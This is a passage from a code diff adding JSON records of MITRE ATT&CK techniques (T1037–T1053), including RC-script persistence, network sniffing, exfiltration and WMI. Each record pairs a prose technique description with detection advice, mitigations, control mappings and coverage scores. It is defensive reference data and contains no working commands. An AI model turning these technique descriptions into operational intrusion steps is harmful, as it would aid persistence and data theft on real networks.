on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. \n \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.", + "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1037.004", + "name": "Boot or Logon Initialization Scripts: RC Scripts", + "url": "https://attack.mitre.org/techniques/T1037/004", + "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)", + "detection": "Monitor for unexpected changes to RC scripts in the /etc/ directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.\n\nMonitor for /etc/rc.local file creation. Although types of RC scripts vary for each Unix-like distribution, several execute /etc/rc.local if present. ", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1037.005", + "name": "Boot or Logon Initialization Scripts: Startup Items", + "url": "https://attack.mitre.org/techniques/T1037/005", + "description": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)\n\nThis is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.", + "detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ], + "cumulative_score": 0.4785214324171429, + "adjusted_score": 0.4785214324171429, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.7,3.3,4.1,5.4,6.1,6.2,6.8" + ], + "nist_controls": [ + "AC-17", + "AC-3", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1039", + "name": "Data from Network Shared Drive", + "description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.", + "url": "https://attack.mitre.org/techniques/T1039", + "tactics": [ + "Collection" + ], + "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Network Share: Network Share Access" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.18976190476190477, + "adjusted_score": 0.18976190476190477, + "has_car": true, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1040", + "name": "Network Sniffing", + "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.", + "url": "https://attack.mitre.org/techniques/T1040", + "tactics": [ + "Credential Access", + "Discovery" + ], + "detection": "Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.", + "platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ], + "cumulative_score": 0.4569448612495238, + "adjusted_score": 0.4569448612495238, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.2,4.6,6.4,6.5,3.10" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-18", + "AC-19", + "IA-2", + "IA-5", + "SC-4", + "SC-8", + "SI-12", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1041", + "name": "Exfiltration Over C2 Channel", + "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", + "url": "https://attack.mitre.org/techniques/T1041", + "tactics": [ + "Exfiltration" + ], + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 0.49453193196095246, + "adjusted_score": 0.49453193196095246, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "13.3,13.8" + ], + "nist_controls": [ + "AC-16", + "AC-2", + "AC-20", + "AC-23", + "AC-3", + "AC-4", + "AC-6", + "CA-3", + "CA-7", + "SA-8", + "SA-9", + "SC-13", + "SC-28", + "SC-31", + "SC-7", + "SI-3", + "SI-4", + "SR-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1046", + "name": "Network Service Scanning", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.", + "url": "https://attack.mitre.org/techniques/T1046", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.", + "platforms": [ + "Containers", + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Cloud Service: Cloud Service Enumeration", + "Command: Command Execution", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ], + "cumulative_score": 0.6550482033295238, + "adjusted_score": 0.6550482033295238, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "3.12,4.4,4.8,7.6,7.7,12.2,12.8,13.3,13.8,16.8,18.2,18.3,16.10" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "RA-5", + "SC-46", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1047", + "name": "Windows Management Instrumentation", + "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)", + "url": "https://attack.mitre.org/techniques/T1047", + "tactics": [ + "Execution" + ], + "detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Network Traffic: Network Connection Creation", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 3.047933333333333, + "adjusted_score": 3.047933333333333, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.7,5.2,5.3,5.4,6.1,6.2,6.8" + ], + "nist_controls": [ + "AC-17", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "RA-5", + "SC-3", + "SC-34", + "SI-16", + "SI-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) ", + "url": "https://attack.mitre.org/techniques/T1048", + "tactics": [ + "Exfiltration" + ], + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1048.001", + "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol", + "url": "https://attack.mitre.org/techniques/T1048/001", + "description": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \n\nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ] + }, + { + "tid": "T1048.002", + "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol", + "url": "https://attack.mitre.org/techniques/T1048/002", + "description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ", + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ] + }, + { + "tid": "T1048.003", + "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol", + "url": "https://attack.mitre.org/techniques/T1048/003", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ", + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ], + "cumulative_score": 0.8302769163219047, + "adjusted_score": 0.8302769163219047, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.2,4.4,7.6,7.7,9.2,12.2,12.8,13.3,13.4,13.8" + ], + "nist_controls": [ + "AC-16", + "AC-2", + "AC-20", + "AC-23", + "AC-3", + "AC-4", + "AC-6", + "CA-3", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SA-8", + "SA-9", + "SC-28", + "SC-31", + "SC-46", + "SC-7", + "SI-10", + "SI-15", + "SI-3", + "SI-4", + "SR-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1049", + "name": "System Network Connections Discovery", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\".", + "url": "https://attack.mitre.org/techniques/T1049", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.21107619047619045, + "adjusted_score": 0.21107619047619045, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1052", + "name": "Exfiltration Over Physical Medium", + "description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", + "url": "https://attack.mitre.org/techniques/T1052", + "tactics": [ + "Exfiltration" + ], + "detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Drive: Drive Creation", + "File: File Access", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1052.001", + "name": "Exfiltration Over Physical Medium: Exfiltration over USB", + "url": "https://attack.mitre.org/techniques/T1052/001", + "description": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", + "detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.", + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1034", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "url": "https://attack.mitre.org/mitigations/M1034" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1034", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "url": "https://attack.mitre.org/mitigations/M1034" + } + ], + "cumulative_score": 0.5389238095238096, + "adjusted_score": 0.5389238095238096, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "2.3,2.5,4.1,10.3,18.3,18.5" + ], + "nist_controls": [ + "AC-16", + "AC-2", + "AC-20", + "AC-23", + "AC-3", + "AC-6", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "MP-7", + "RA-5", + "SA-8", + "SC-28", + "SC-41", + "SI-3", + "SI-4", + "SR-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1053", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).", + "url": "https://attack.mitre.org/techniques/T1053", + "tactics": [ + "Execution", + "Persistence", + "Privilege Escalation" + ], + "detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate 